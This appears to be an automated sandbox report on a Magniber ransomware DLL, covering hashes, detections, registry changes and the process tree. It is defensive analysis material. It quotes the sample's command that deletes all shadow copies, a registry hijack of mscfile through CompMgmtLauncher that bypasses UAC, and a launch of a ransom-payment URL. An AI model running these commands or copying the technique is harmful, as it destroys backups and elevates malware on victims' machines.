Overview
overview
10Static
static
10samples5.zip
windows7-x64
1samples5.zip
windows10-2004-x64
1104b5623d8...d3.exe
windows7-x64
1104b5623d8...d3.exe
windows10-2004-x64
1160010289c...02.exe
windows7-x64
1160010289c...02.exe
windows10-2004-x64
11a757d4aa5...6f.exe
windows7-x64
11a757d4aa5...6f.exe
windows10-2004-x64
121ff399e57...56.dll
windows7-x64
121ff399e57...56.dll
windows10-2004-x64
13c311150e2...bf.exe
windows7-x64
13c311150e2...bf.exe
windows10-2004-x64
13efe068c64...0f.exe
windows7-x64
33efe068c64...0f.exe
windows10-2004-x64
3403be0442e...17.exe
windows7-x64
10403be0442e...17.exe
windows10-2004-x64
1049c96478e9...66.exe
windows7-x64
649c96478e9...66.exe
windows10-2004-x64
65154914351...a7.exe
windows7-x64
15154914351...a7.exe
windows10-2004-x64
1616ea8ac34...858437
windows7-x64
1616ea8ac34...858437
windows10-2004-x64
16a637e90e0...bc.exe
windows7-x64
106a637e90e0...bc.exe
windows10-2004-x64
9759c06eedc...4c.dll
windows7-x64
10759c06eedc...4c.dll
windows10-2004-x64
1085cad059cc...20.exe
windows7-x64
185cad059cc...20.exe
windows10-2004-x64
18ca6b7929e...3c.exe
windows7-x64
108ca6b7929e...3c.exe
windows10-2004-x64
990ef3f841b...77.exe
windows7-x64
990ef3f841b...77.exe
windows10-2004-x64
9Analysis
-
max time kernel
120s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
01-01-2024 15:27
Behavioral task
behavioral1
Sample
samples5.zip
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
samples5.zip
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
104b5623d8edd7e56d7e824d900ef57cc085ad7b2935c794af58de87d4f8c2d3.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
104b5623d8edd7e56d7e824d900ef57cc085ad7b2935c794af58de87d4f8c2d3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
160010289cc38de42f7b75fa817a6ef7931bfd8aa1370fb09559b2e035e05702.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
160010289cc38de42f7b75fa817a6ef7931bfd8aa1370fb09559b2e035e05702.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
1a757d4aa506d48a09ed5cf0c8f21b6d65a55f5e8aa736873a9e523c4278156f.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
1a757d4aa506d48a09ed5cf0c8f21b6d65a55f5e8aa736873a9e523c4278156f.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral9
Sample
21ff399e57cc306a1ae1daab6009ea40c8aa96c39296d0f8781626de6bd19256.dll
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
21ff399e57cc306a1ae1daab6009ea40c8aa96c39296d0f8781626de6bd19256.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
3c311150e20d76edd9274cec783068667637b6b5f3b6e1a5031a8605b895fabf.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
3c311150e20d76edd9274cec783068667637b6b5f3b6e1a5031a8605b895fabf.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
3efe068c644c96fff2a25a7351da85bad86949878df3c7cad76d83ad2f2c340f.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
3efe068c644c96fff2a25a7351da85bad86949878df3c7cad76d83ad2f2c340f.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
403be0442e847aee7ca7553e19672112450f2e034180a1f57eb8a6d7d39b8d17.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
403be0442e847aee7ca7553e19672112450f2e034180a1f57eb8a6d7d39b8d17.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
49c96478e9d2b16219a7c86f031c5d8b241ae43550ce2fc2bea1d98fa90aa766.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
49c96478e9d2b16219a7c86f031c5d8b241ae43550ce2fc2bea1d98fa90aa766.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
5154914351d1abdc308c8a76474a19560a4624194feb98118d0710efb6804aa7.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
5154914351d1abdc308c8a76474a19560a4624194feb98118d0710efb6804aa7.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
616ea8ac34ae403d7094d53c0db11a24348f6e48eff80e254a93a1593f858437
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
616ea8ac34ae403d7094d53c0db11a24348f6e48eff80e254a93a1593f858437
Resource
win10v2004-20231222-en
Behavioral task
behavioral23
Sample
6a637e90e0673ee6090cc4fb47d82ab87ae7d26ffcff7a7dcafd4da167aea8bc.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
6a637e90e0673ee6090cc4fb47d82ab87ae7d26ffcff7a7dcafd4da167aea8bc.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
759c06eedcadd60ebd2aa3790eefa40d505044080cea4e1477d845611f322b4c.dll
Resource
win7-20231129-en
Behavioral task
behavioral26
Sample
759c06eedcadd60ebd2aa3790eefa40d505044080cea4e1477d845611f322b4c.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
85cad059cca352e70188c1744521100651a787ebabdaa8261badb0f3b6bb5020.exe
Resource
win7-20231129-en
Behavioral task
behavioral28
Sample
85cad059cca352e70188c1744521100651a787ebabdaa8261badb0f3b6bb5020.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
8ca6b7929ece89d8d9050ae9f1e6c1b3dfa87217272e114e464160dce036463c.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
8ca6b7929ece89d8d9050ae9f1e6c1b3dfa87217272e114e464160dce036463c.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
90ef3f841bef457a352a092f2367a0de89d812318df6b2293876d5746281c777.exe
Resource
win7-20231215-en
Behavioral task
behavioral32
Sample
90ef3f841bef457a352a092f2367a0de89d812318df6b2293876d5746281c777.exe
Resource
win10v2004-20231215-en
General
-
Target
759c06eedcadd60ebd2aa3790eefa40d505044080cea4e1477d845611f322b4c.dll
-
Size
38KB
-
MD5
1f837affe14eeee652ae0271f0cb3804
-
SHA1
5f55dad94a03100542c61777233f7846f9376625
-
SHA256
759c06eedcadd60ebd2aa3790eefa40d505044080cea4e1477d845611f322b4c
-
SHA512
a620bbb9b59fa93cff35d95c6c2000226361fcbcb869d4ec300caec97723802516a430d663e26c129b8c42f1ef9c27b90963896ac86207c7193513567850691b
-
SSDEEP
768:FGcHvpu++E69ZxPGlISQAtxaYzUmFCL+4pO6Dzhc:Fju++E6XxPGlISR5UmoLTO2+
Malware Config
Signatures
-
Detect magniber ransomware 2 IoCs
resource yara_rule behavioral25/memory/2928-1-0x0000000001DF0000-0x0000000002713000-memory.dmp family_magniber behavioral25/memory/1260-16-0x00000000003A0000-0x00000000003A5000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 9 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1832 1716 vssadmin.exe 42 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2288 1716 cmd.exe 42 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1756 1716 vssadmin.exe 42 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1728 1716 vssadmin.exe 42 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 900 1716 vssadmin.exe 42 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2152 1716 cmd.exe 42 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 208 1716 vssadmin.exe 42 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2972 1716 cmd.exe 42 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1640 1716 vssadmin.exe 42 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (84) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2928 set thread context of 1260 2928 rundll32.exe 9 PID 2928 set thread context of 1344 2928 rundll32.exe 8 PID 2928 set thread context of 1380 2928 rundll32.exe 7 PID 2928 set thread context of 1876 2928 rundll32.exe 5 -
Interacts with shadow copies 2 TTPs 8 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1756 vssadmin.exe 1728 vssadmin.exe 900 vssadmin.exe 208 vssadmin.exe 1640 vssadmin.exe 2696 vssadmin.exe 1860 vssadmin.exe 1832 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000046332ab722508540bf00312f0a24f1200000000002000000000010660000000100002000000083511ded23e631dd07967983e4fb0c0197bdb6e843ced1b4f674e9d48ef7ba75000000000e8000000002000020000000645a463d3507b5e703df4685db2bbc5dbf345f6e5b079cac83b2f6cbe4dd1f749000000050693f0cf36d1a03336ee284e4edbce02a84786e81a6cd5fe341dadd551145aea90f97772976383782b3e02750c75768dd380c3549e9ac41d998b9d9b9550fa5b8bc00b3d6cf6000182fa9cdd40a7750eeb3784e8cba842c55872b53ad88b6695aa85e6d6b8186aa2e2a920447ceaa90c3ffbe5534875608f1f81092833389252d8b135c22c678f5208eedb516e98d2240000000f00358dab28bc46b24623edecf6122ef14813e6dac7f5811c25f77d058b6de3ca97099c0b0aa7d1478c8ec0a604d0a376f75b2ad1b301c409135c7af097794e2 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "410284971" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{DD1E0E71-A8BA-11EE-A497-46361BFF2467} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000046332ab722508540bf00312f0a24f12000000000020000000000106600000001000020000000f6468610a89f6fd4eb76ce5de4e341f13afaa8423e90084cd19601dbe6fd556f000000000e80000000020000200000007cb467d4e50a31536d6f1d48f58514363fd56f00f96f96669c4755b73442f6a1200000004c3eb50620d665e4e04733c46e087824f608c8eedc6a751a8f932debe9dfdca1400000006ce6d79b63da1af69c5b65ff44c373e87c768b4825f58b4dd25097d7a8f841aa7aec481ae731a12014c4114a46e9445abce963fbcd292b2dc8ea5144f1894759 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0ecc9b1c73cda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command Dwm.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1228 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2928 rundll32.exe 2928 rundll32.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2928 rundll32.exe 2928 rundll32.exe 2928 rundll32.exe 2928 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1380 Explorer.EXE Token: SeShutdownPrivilege 1380 Explorer.EXE Token: SeShutdownPrivilege 1380 Explorer.EXE Token: SeShutdownPrivilege 1380 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1124 wmic.exe Token: SeSecurityPrivilege 1124 wmic.exe Token: SeTakeOwnershipPrivilege 1124 wmic.exe Token: SeLoadDriverPrivilege 1124 wmic.exe Token: SeSystemProfilePrivilege 1124 wmic.exe Token: SeSystemtimePrivilege 1124 wmic.exe Token: SeProfSingleProcessPrivilege 1124 wmic.exe Token: SeIncBasePriorityPrivilege 1124 wmic.exe Token: SeCreatePagefilePrivilege 1124 wmic.exe Token: SeBackupPrivilege 1124 wmic.exe Token: SeRestorePrivilege 1124 wmic.exe Token: SeShutdownPrivilege 1124 wmic.exe Token: SeDebugPrivilege 1124 wmic.exe Token: SeSystemEnvironmentPrivilege 1124 wmic.exe Token: SeRemoteShutdownPrivilege 1124 wmic.exe Token: SeUndockPrivilege 1124 wmic.exe Token: SeManageVolumePrivilege 1124 wmic.exe Token: 33 1124 wmic.exe Token: 34 1124 wmic.exe Token: 35 1124 wmic.exe Token: SeIncreaseQuotaPrivilege 1708 WMIC.exe Token: SeSecurityPrivilege 1708 WMIC.exe Token: SeTakeOwnershipPrivilege 1708 WMIC.exe Token: SeLoadDriverPrivilege 1708 WMIC.exe Token: SeSystemProfilePrivilege 1708 WMIC.exe Token: SeSystemtimePrivilege 1708 WMIC.exe Token: SeProfSingleProcessPrivilege 1708 WMIC.exe Token: SeIncBasePriorityPrivilege 1708 WMIC.exe Token: SeCreatePagefilePrivilege 1708 WMIC.exe Token: SeBackupPrivilege 1708 WMIC.exe Token: SeRestorePrivilege 1708 WMIC.exe Token: SeShutdownPrivilege 1708 WMIC.exe Token: SeDebugPrivilege 1708 WMIC.exe Token: SeSystemEnvironmentPrivilege 1708 WMIC.exe Token: SeRemoteShutdownPrivilege 1708 WMIC.exe Token: SeUndockPrivilege 1708 WMIC.exe Token: SeManageVolumePrivilege 1708 WMIC.exe Token: 33 1708 WMIC.exe Token: 34 1708 WMIC.exe Token: 35 1708 WMIC.exe Token: SeIncreaseQuotaPrivilege 1124 wmic.exe Token: SeSecurityPrivilege 1124 wmic.exe Token: SeTakeOwnershipPrivilege 1124 wmic.exe Token: SeLoadDriverPrivilege 1124 wmic.exe Token: SeSystemProfilePrivilege 1124 wmic.exe Token: SeSystemtimePrivilege 1124 wmic.exe Token: SeProfSingleProcessPrivilege 1124 wmic.exe Token: SeIncBasePriorityPrivilege 1124 wmic.exe Token: SeCreatePagefilePrivilege 1124 wmic.exe Token: SeBackupPrivilege 1124 wmic.exe Token: SeRestorePrivilege 1124 wmic.exe Token: SeShutdownPrivilege 1124 wmic.exe Token: SeDebugPrivilege 1124 wmic.exe Token: SeSystemEnvironmentPrivilege 1124 wmic.exe Token: SeRemoteShutdownPrivilege 1124 wmic.exe Token: SeUndockPrivilege 1124 wmic.exe Token: SeManageVolumePrivilege 1124 wmic.exe Token: 33 1124 wmic.exe Token: 34 1124 wmic.exe Token: 35 1124 wmic.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
pid Process 2236 iexplore.exe 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE 1380 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2236 iexplore.exe 2236 iexplore.exe 2768 IEXPLORE.EXE 2768 IEXPLORE.EXE 2768 IEXPLORE.EXE 2768 IEXPLORE.EXE -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 1380 Explorer.EXE 1380 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2928 wrote to memory of 1228 2928 rundll32.exe 50 PID 2928 wrote to memory of 1228 2928 rundll32.exe 50 PID 2928 wrote to memory of 1228 2928 rundll32.exe 50 PID 2928 wrote to memory of 2064 2928 rundll32.exe 49 PID 2928 wrote to memory of 2064 2928 rundll32.exe 49 PID 2928 wrote to memory of 2064 2928 rundll32.exe 49 PID 2928 wrote to memory of 1124 2928 rundll32.exe 47 PID 2928 wrote to memory of 1124 2928 rundll32.exe 47 PID 2928 wrote to memory of 1124 2928 rundll32.exe 47 PID 2928 wrote to memory of 564 2928 rundll32.exe 46 PID 2928 wrote to memory of 564 2928 rundll32.exe 46 PID 2928 wrote to memory of 564 2928 rundll32.exe 46 PID 564 wrote to memory of 1708 564 cmd.exe 44 PID 564 wrote to memory of 1708 564 cmd.exe 44 PID 564 wrote to memory of 1708 564 cmd.exe 44 PID 2064 wrote to memory of 2236 2064 cmd.exe 43 PID 2064 wrote to memory of 2236 2064 cmd.exe 43 PID 2064 wrote to memory of 2236 2064 cmd.exe 43 PID 1900 wrote to memory of 2772 1900 cmd.exe 36 PID 1900 wrote to memory of 2772 1900 cmd.exe 36 PID 1900 wrote to memory of 2772 1900 cmd.exe 36 PID 2236 wrote to memory of 2768 2236 iexplore.exe 30 PID 2236 wrote to memory of 2768 2236 iexplore.exe 30 PID 2236 wrote to memory of 2768 2236 iexplore.exe 30 PID 2236 wrote to memory of 2768 2236 iexplore.exe 30 PID 2772 wrote to memory of 2964 2772 CompMgmtLauncher.exe 34 PID 2772 wrote to memory of 2964 2772 CompMgmtLauncher.exe 34 PID 2772 wrote to memory of 2964 2772 CompMgmtLauncher.exe 34 PID 1260 wrote to memory of 2560 1260 taskhost.exe 57 PID 1260 wrote to memory of 2560 1260 taskhost.exe 57 PID 1260 wrote to memory of 2560 1260 taskhost.exe 57 PID 1260 wrote to memory of 1448 1260 taskhost.exe 56 PID 1260 wrote to memory of 1448 1260 taskhost.exe 56 PID 1260 wrote to memory of 1448 1260 taskhost.exe 56 PID 1448 wrote to memory of 2432 1448 cmd.exe 67 PID 1448 wrote to memory of 2432 1448 cmd.exe 67 PID 1448 wrote to memory of 2432 1448 cmd.exe 67 PID 2288 wrote to memory of 1676 2288 cmd.exe 58 PID 2288 wrote to memory of 1676 2288 cmd.exe 58 PID 2288 wrote to memory of 1676 2288 cmd.exe 58 PID 1676 wrote to memory of 956 1676 CompMgmtLauncher.exe 62 PID 1676 wrote to memory of 956 1676 CompMgmtLauncher.exe 62 PID 1676 wrote to memory of 956 1676 CompMgmtLauncher.exe 62 PID 1344 wrote to memory of 3064 1344 Dwm.exe 72 PID 1344 wrote to memory of 3064 1344 Dwm.exe 72 PID 1344 wrote to memory of 3064 1344 Dwm.exe 72 PID 1344 wrote to memory of 3044 1344 Dwm.exe 71 PID 1344 wrote to memory of 3044 1344 Dwm.exe 71 PID 1344 wrote to memory of 3044 1344 Dwm.exe 71 PID 3044 wrote to memory of 884 3044 cmd.exe 68 PID 3044 wrote to memory of 884 3044 cmd.exe 68 PID 3044 wrote to memory of 884 3044 cmd.exe 68 PID 2152 wrote to memory of 1960 2152 cmd.exe 73 PID 2152 wrote to memory of 1960 2152 cmd.exe 73 PID 2152 wrote to memory of 1960 2152 cmd.exe 73 PID 1960 wrote to memory of 2644 1960 CompMgmtLauncher.exe 78 PID 1960 wrote to memory of 2644 1960 CompMgmtLauncher.exe 78 PID 1960 wrote to memory of 2644 1960 CompMgmtLauncher.exe 78 PID 1380 wrote to memory of 2468 1380 Explorer.EXE 85 PID 1380 wrote to memory of 2468 1380 Explorer.EXE 85 PID 1380 wrote to memory of 2468 1380 Explorer.EXE 85 PID 1380 wrote to memory of 2580 1380 Explorer.EXE 84 PID 1380 wrote to memory of 2580 1380 Explorer.EXE 84 PID 1380 wrote to memory of 2580 1380 Explorer.EXE 84 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\759c06eedcadd60ebd2aa3790eefa40d505044080cea4e1477d845611f322b4c.dll,#11⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:564
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\system32\cmd.execmd /c "start http://5c5cf6f870b88a5024upywsch.uscatch.club/upywsch^&2^&33016245^&84^&369^&12"?2⤵
- Suspicious use of WriteProcessMemory
PID:2064
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt?2⤵
- Opens file in notepad (likely ransom note)
PID:1228
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1876
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵PID:2580
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:1576
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2468
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:3044
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:3064
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:2432
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2560
-
-
